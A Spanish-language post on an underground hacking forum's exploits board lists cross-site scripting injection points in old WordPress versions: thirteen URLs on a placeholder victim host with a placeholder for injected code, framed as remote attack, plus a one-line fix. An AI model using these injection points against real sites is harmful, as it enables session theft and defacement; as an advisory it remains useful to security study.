Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Julio 26, 2008, 12:04:09
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Wordpress Cross-Site Scripting Vulnerabilities 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Wordpress Cross-Site Scripting Vulnerabilities  (Leído 499 veces)
4le3ek5
Visitante
« en: Octubre 01, 2004, 02:25:54 »
Tipo::
Cross Site Scripting

DONDE:
Ataque Remoto

SOFTWARE:
Wordpress 0.x

Wordpress 1.x


DESCRIPTION:
Esta vulnerabilidad se trata de insertar codigo a la url (xxs) de manera remota, de manera que tenemos que encontrar un servidor con WORDPRESS y su correspondiente version.

Ejemplos:
Código:
http://[victim]/wp-login.php?redirect_to=[codigo]
http://[victim]/wp-login.php?mode=bookmarklet&text=[codigo]
http://[victim]/wp-login.php?mode=bookmarklet&popupurl=[codigo]
http://[victim]/wp-login.php?mode=bookmarklet&popuptitle=[codigo]
http://[victim]/admin-header.php?redirect=1&redirect_url=%22;[codigo]//
http://[victim]/bookmarklet.php?popuptitle=[codigo]
http://[victim]/bookmarklet.php?popupurl=[codigo]
http://[victim]/bookmarklet.php?content=[codigo]
http://[victim]/bookmarklet.php?post_title=[codigo]
http://[victim]/categories.php?action=edit&cat_ID=[codigo]
http://[victim]/edit.php?s=[codigo]
http://[victim]/edit-comments.php?s=[codigo]
http://[victim]/edit-comments.php?mode=[codigo]

SOLUCION:
Edita el codigo fuente de manera de que ese directorio quede a salvo o usa otro producto.
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Wordpress Cross-Site Scripting Vulnerabilities « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC